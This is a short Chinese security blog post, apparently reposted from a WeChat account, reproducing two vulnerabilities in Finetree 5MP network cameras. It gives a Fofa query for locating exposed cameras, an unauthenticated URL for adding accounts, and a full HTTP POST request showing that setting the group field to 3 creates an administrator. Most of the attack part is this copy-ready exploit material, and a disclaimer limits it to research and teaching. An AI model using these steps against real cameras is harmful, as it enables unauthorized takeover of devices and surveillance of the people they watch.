Finetree-5MP-摄像机双漏洞复现

admin
admin
admin
139164
文章
114
评论
2021年6月23日02:00:50评论401 views字数 847阅读2分49秒阅读模式

Fofa搜索:https://fofa.so/


app="Finetree-5MP-Network-Camera"


Finetree-5MP-摄像机双漏洞复现


漏洞复现

未授权访问添加 [未登录状态的]

exp:http://ip:port/quicksetup/user_pop.php?method=add

添加回出现报错,不用管,直接登录即可


Finetree-5MP-摄像机双漏洞复现

另一个漏洞:

已知低权限更改高权限,添加用户,用burp抓包看看什么情况

添加一个测试账号,test,得到的请求包是这样:

 1 POST /quicksetup/user_update.php HTTP/1.1 2 Host: x.x.x,x:8086 3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 4 Accept: */* 5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 6 Accept-Encoding: gzip, deflate 7 Content-Type: application/x-www-form-urlencoded 8 Content-Length: 52 9 Origin: http://x.x.x.x:808610 Connection: close11 Referer: http://x.x.x.x:8086/quicksetup/user_pop.php?method=add12 Cookie: PHPSESSID=g02lv1iu0aod4ao75ioil2m0m313 14 method=add&user=test&pwd=123456&group=1&ptz_enable=0

以上ip经过处理

group是组,1代表guest,2是operator,3是administrator,截断修改group=可以修改为管理员权限。

Finetree-5MP-摄像机双漏洞复现

Finetree-5MP-摄像机双漏洞复现


本文始发于微信公众号(暗影安全):Finetree-5MP-摄像机双漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月23日02:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Finetree-5MP-摄像机双漏洞复现https://cn-sec.com/archives/404349.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息